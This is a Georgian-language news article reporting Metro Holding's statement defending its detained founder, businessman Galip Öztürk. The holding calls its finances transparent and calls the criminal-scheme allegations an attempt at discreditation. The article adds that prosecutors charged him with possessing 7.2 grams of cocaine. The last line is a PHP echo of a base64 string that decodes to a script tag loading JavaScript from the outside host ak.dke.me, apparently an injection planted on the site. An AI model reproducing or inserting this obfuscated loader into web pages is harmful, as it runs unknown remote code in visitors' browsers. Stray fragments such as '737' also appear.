celsiusi
ავერსი საქკაბელი
დაკავებული ბიზნესმენის, გალიფ ოზთურქის "მეტრო ჰოლდინგი" ახალ განცხადებას ავრცელებს. ჰოლდინგი აღნიშნავს, რომ გალიფ ოზთურქს საქართველოში უმსხვილესი საინვესტიციო პროექტები აქვს განხორციელებული და ჯგუფში შემავალი 60-მდე კომპანია ამჟამად 3,000 ადამიანს ასაქმებს. "მეტრო ჰოლდინგი" აცხადებს, რომ მათი ფინანსური საქმიანობა არის გამჭვირვალე. ორგანიზაცია აღნიშნავს, რომ განცხადებები თითქოს კომპანიაში დანაშაულებრივი სქემა არსებობდა, ყოველგვარ აზრს მოკლებულია. 
 
"მასობრივი ინფორმაციის საშუალებებში ბოლო პერიოდის განმავლობაში გავრცელდა არაერთი გადაუმოწმებელი და სრულიად აბსურდული განცხადებები „მეტრო ჰოლდინგი“-ს და მისი დამფუძნებლის, ცნობილი ბიზნესმენის და მეცენატის ბატონი გალიფ ოზთურქის საქართველოში საქმიანობის შესახებ.
 
შესაბამისად, მეტრო ჰოლდინგი საჭიროდ თვლის საზოგადოებას მიაწოდოს რამდენიმე მნიშვნელოვანი, ფაქტებზე დაფუძნებული ინფორმაცია.
 
ბოლო 8 წლის განმავლობაში, გალიფ ოზთურქის მიერ აჭარის რეგიონში (და არამხოლოდ) უპრეცედენტო მასშტაბებისა და რაოდენობის ბიზნეს პროექტების განხორციელდა. ამ პერიოდის განმავლობაში მის მიერ საქართველოს ტერიტორიაზე სხვადასხვა ბიზნესპროექტში ინვესტირებულია, დაახლოებით, ერთი მილიარდი ლარის ოდენობის პირდაპირი ინვესტიცია. ამასთან, ქვეყანაში მისი ჯგუფის მიერ უცხოეთიდან განხორციელებული ინვესტიცია რეინვესტირდა ისევ საქართველოში, რაც საქმიანობის სექტორის გაფართოვებისა და შესაბამისად, დამატებითი სამუშო ადგილების შექმნის წინაპირობად იქცა.
 
ბატონი ოზთურქის მიერ დაარსებული „მეტრო ჰოლდინგი“ დღეისათვის აერთიანებს 60-მდე კომპანიას და დასაქმებული ჰყავს 3000-ზე მეტი თანამშრომელი. „მეტრო ჰოლდინგის“ ძირითადი კომპანია „მეტრო ავრასია ინვესთმენთ ჯორჯია“ ბოლო წლების ჩათვლით იკავებდა ლიდერ პოზიციებს „ფორბსის“ და სხვა ბიზნეს გამოცემების რეიტინგებში (მათ შორის 2019 წელს შედიოდა ტოპ სამეულშიც).
 
ჰოლდინგის ძირითადი საქმიანობა მოიცავს დეველოპერულ ბიზნესს და შესაბამისად, ყველა მის მიერ წარმოებული ოპერაცია არის გამჭვირვალე და სისტემატიურად მოწმდება ისეთი ცნობილი აუდიტორული კომპანიების მიერ, როგორიცაა BDO, Grand Thornton, Prestige Audit, Audit&Business, ასევე საერთაშორისო თუ ადგილობრივი კონსალტინგური კომპანიების მიერ. აუდიტორული კომპანიების ყველა დასკვნა საჯაროა და ნებისმიერ დაინტერესებულ პირს აქვს გაცნობის შესაძლებლობა.
 
ამასთან, ხაზგასმით უნდა აღინიშნოს, რომ „მეტრო ჰოლდინგი“-ში შემავალი კომპანიების უდიდესი ნაწილი წარმოადგენს სააქციო საზოგადოებას და მათი აქციები განთავსებულია საქართველოს და საერთაშორისო საფონდო ბირჟებზე, რაც კანონმდებლობის მიხედვით, კომპანიას დამატებითი ფინანსური გამჭვირვალეობის ვალდებულებას აკისრებს. ვფიქრობთ, ნებისმიერი ნეიტრალური მხარისთვის სავსებით ნათელი და გასაგებია, რომ წლების განმავლობაში სახელმწიფო ორგანოთა მიერ განხორციელებული არაერთი შესწავლის, მათ შორის საფონდო ბირჟის, ეროვნული ბანკის მიერ გაცემული დასტურის შემდეგ, ამ სახის „დანაშაულებრივი სქემის აღმოჩენა“ ყოველგვარ სამართლებრივ საფუძველს მოკლებულია და მიზნად ისახავს კონკრეტული პირების დისკრედიტაციას.
 
საქართველოს მთავრობის მხარდაჭერით 2014 წლიდან ბატონი გალიფ ოზთურქი წარმოადგენს საქართველოს მოქალაქეს და შესაბამისად, სრულყოფილად ასრულებს საქართველოს მოქალაქისთვის დაკისრებულ ყველა ვალდებულებას. ამავე დროს მნიშვნელოვანია ყველამ გააცნობიეროს, რომ ბატონ ოზთურქს, როგორც საქართველოს მოქალაქეს, აქვს შესაბამისი უფლებებიც.
 
რაც შეეხება იმ ცნობილ ბრალდებებს, რაც დაკავშირებულია „ნარკოტიკული საშუალებების“ აღმოჩენასთან: ჩვენი ჯგუფის ადვოკატები ინტენსიურად მუშაობენ აღნიშნულ საკითხზე და შესაძლებლობის ფარგლებში გაასაჯაროვებენ სამართლებრივ დეტალებს, რაც ამჟამად დაცვის მხარის ინტერესებიდან გამომდინარე შეუძლებელია.
 
როგორც უკვე განვაცხადეთ, ბატონი გალიფ ოზთურქი თავს უდანაშაულოდ მიიჩნევს და თვლის, რომ ამ ეტაპზე მისი პატიმრობა მეორეხარისხოვანია. იგი განსაკუთრებულ აქცენტს აკეთებს ჰოლდინგის მომავალზე, რამეთუ მისი შეფასებით, ამ ვითარებაში უპირველეს ამოცანას წარმოადგენს სამუშო პროცესის გაგრძელება და ყველაზე ძვირფასი რესურსის, თანამშრომლების შენარჩუნება, ვინაიდან მისი შეფასებით ფუნდამენტურ ღირებულებას წარმოადგენს მხოლოდ ადამიანი.
 
2 ივნისს საქართველოს პროკურატურამ გაავრცელა განცხადება, რომლის მიხედვითაც, ბიზნესმენ გალიფ ოზთურქს ნარკოდანაშაულისთვის წაუყენეს ბრალი, რაც 7.2 გრამი კოკაინის შენახვას უკავშირდებოდა. ბრალი 8-დან 20 წლამდე ან უვადო პატიმრობას ითვალისწინებს. მას ჯერჯერობით ფინანსური დანაშაულისთვის ბრალი წარდგენილი არ აქვს. 
 
„მეტრო ჰოლდინგის“ მენეჯმენტი იმედს გამოთქვამს, რომ უახლოეს პერიოდში ჰოლდინგის დამფუძნებელს და ყველა თანამშრომელს მიეცემა საქმიანობის შეუფერხებლად განხორციელების შესაძლებლობა. „ვინაიდან კომპანია ოპერირებს ტურიზმის სექტორში, სეზონის მოახლოებასთან ერთად მოსამზადებელი სამუშაოები აქტიურ ფაზაში შედის. მიუხედავად ჩვენს წინაშე არსებული რთული გამოწვევებისა, ყველა ღონეს ვიყენებთ, რათა მზად დავხვდეთ ტურისტულ სეზონს და ამასთან, არ შევაჩეროთ არცერთი მიმდინარე საინვესტიციო პროექტი. მიმდინარე პროცესებს განსაკუთრებული ინტერესით აკვირდებიან პარტნიორები სხვადასხვა ქვეყნებიდან, გვსურს ვაჩვენოთ ყველა ჩვენ პარტნიორს საიმედოობაა, მდგრადობა. ვიყოთ მაგალითი შეუპოვრობისა, სიმტკიცისა და სიძლიერისა. შევძლოთ ყველა ინტერესზე მაღლა ქვეყნის ინტერესების დაყენება და მიუხედავად შექმნილი გაურკვევლობისა, არც ერთი ჩვენი განცხადებითა თუ ნაბიჯით არ დავაზარალოთ ბიზნეს გარემო და ხელი არ შევუშალოთ ქვეყანაში პირდაპირი ინვესტიციების შემოდინებას“.
 
მეტრო ჰოლდინგის დამფუძნებელს და მენეჯმენტს გაცნობიერებული აქვთ უზარმაზარი პასუხისმგებლობა საქართველოს, 3000-ზე მეტი თანამშრომლისა და მათი ოჯახების მიმართ და ყველაფერს აკეთებენ საქმიანობის ჩვეულ რეჟიმში დასაბრუნებლად, რა მიზნითაც „მეტრო ჰოლდინგი“ კიდევ ერთხელ გამოთქვამს მზადყოფნას, სიმართლის დასადგენად ინტენსიურად ითანამშრომლოს სახელმწიფო ორგანოებთან,"  - ნათქვამია განცხადებაში.
 
737
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");